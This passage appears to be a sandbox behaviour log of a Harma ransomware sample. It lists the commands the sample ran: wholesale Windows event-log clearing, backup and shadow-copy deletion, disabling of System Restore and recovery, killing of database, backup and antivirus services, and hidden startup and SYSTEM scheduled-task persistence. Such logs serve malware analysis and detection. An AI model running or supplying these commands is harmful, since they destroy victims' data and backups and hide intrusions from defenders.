- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wcmsvc/Diagnostic"
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Operational"
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
    3⤵
    PID:3592
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-MediaManager/Diagnostic"
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-CFE/Diagnostic"
    3⤵
    PID:712
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPUS/Analytic"
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPIP/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3724
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Analytic"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPBT/Analytic"
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
    3⤵
    - Clears Windows event logs
    PID:3232
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
    3⤵
    PID:3788
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-API/Analytic"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Debug"
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-MediaManager/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3376
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-Driver/Analytic"
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
    3⤵
    PID:672
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WER-PayloadHealth/Operational"
    3⤵
    PID:876
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WEPHOSTSVC/Operational"
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WCNWiz/Analytic"
    3⤵
    PID:840
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
    3⤵
    PID:448
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Analytic"
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
    3⤵
    - Clears Windows event logs
    PID:3280
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VerifyHardwareSecurity/Operational"
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VerifyHardwareSecurity/Admin"
    3⤵
    PID:548
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VPN/Operational"
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VIRTDISK-Analytic"
    3⤵
    PID:3680
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VHDMP-Analytic"
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3996
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceInstall"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserAccountControl/Diagnostic"
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User-Loader/Operational"
    3⤵
    PID:920
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
    3⤵
    PID:1288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:1948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:2172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:3660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:3348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:4388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:1440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:4864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:4648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:4268
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start= disabled
    3⤵
    - Launches sc.exe
    PID:4336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    - Launches sc.exe
    PID:320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:1320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  2⤵
  PID:5104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:5020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:4288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:1396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  2⤵
  PID:4668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:4472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:2628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:4988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:4060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:2464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\HRMPUB
  2⤵
  PID:4736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win h:*.dsk
  2⤵
  PID:748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win g:*.dsk
  2⤵
  PID:2720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win f:*.dsk
  2⤵
  PID:5072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win e:*.dsk
  2⤵
  PID:3328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win c:*.dsk
  2⤵
  PID:1292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:3680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:4716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  PID:3108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  PID:4568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  PID:1088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  PID:372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  PID:464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  PID:4720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:4052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
  2⤵
  PID:2744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
  2⤵
  PID:4268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
  2⤵
  PID:3568
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
  2⤵
  PID:412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
  2⤵
  PID:3440

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
1⤵
- Drops startup file
- Views/modifies file attributes
PID:1956

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /RU SYSTEM /RL HIGHEST /F
1⤵
- Creates scheduled task(s)
PID:4336

C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\harma.exe
1⤵
- Views/modifies file attributes
PID:3592

C:\Windows\SysWOW64\attrib.exe
attrib +h +s harma.exe
1⤵
- Views/modifies file attributes
PID:3244

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
1⤵
PID:548
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /t /f /im sql*
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4832

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im veeam*
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
1⤵
PID:464

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
1⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
1⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c wmic shadowcopy delete
1⤵
PID:112
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  wmic shadowcopy delete
  2⤵
  PID:624

C:\Windows\SysWOW64\net.exe
net stop McAfeeDLPAgentService /y
1⤵
PID:1332
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
  2⤵
  PID:4628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:1420

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\SysWOW64\net.exe
net stop mfewc /y
1⤵
PID:4472

C:\Windows\SysWOW64\net.exe
net stop NetBackup BMR MTFTP Service /y
1⤵
PID:2976
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:2736

C:\Windows\SysWOW64\sc.exe
sc config SQLTELEMETRY start=disabled
1⤵
- Launches sc.exe
PID:816

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mspub.exe /F
1⤵
- Kills process with taskkill
PID:2336

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mydesktopqos.exe /F
1⤵
- Kills process with taskkill
PID:1900

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mydesktopservice.exe /F
1⤵
- Kills process with taskkill
PID:1772

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
1⤵
PID:4616

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
1⤵
PID:320

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
1⤵
PID:2568

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
1⤵
PID:208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe el
1⤵
PID:4084

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Analytic"
1⤵
PID:3184

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
1⤵
PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "FirstUXPerf-Analytic"
1⤵
PID:4988

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "IHM_DebugChannel"
1⤵
PID:4628
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:1332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
1⤵
PID:2628

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
1⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationDS"
1⤵
PID:1912

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationMediaEngine"
1⤵
PID:1684

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationMP4"
1⤵
PID:3336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
1⤵
PID:2548

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
1⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Debug"
1⤵
PID:2744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
1⤵
PID:4720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
1⤵
PID:948

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
1⤵
PID:464

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
1⤵
PID:3208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
1⤵
- Clears Windows event logs
PID:1484

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
1⤵
PID:4064

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
1⤵
PID:448

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
1⤵
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
1⤵
PID:3376

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
1⤵
PID:3440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
1⤵
PID:3744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
1⤵
PID:412

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
1⤵
PID:4596

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
1⤵
PID:1192

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
1⤵
PID:5076

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
1⤵
- Clears Windows event logs
PID:3772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
1⤵
PID:4220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
1⤵
PID:2380

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
1⤵
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
1⤵
PID:1608

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
1⤵
PID:4500
- C:\Windows\SysWOW64\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:1616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
1⤵
PID:3244

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
1⤵
PID:2176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
1⤵
PID:4564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
1⤵
PID:3816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
1⤵
PID:2680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
1⤵
PID:100

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
1⤵
PID:220

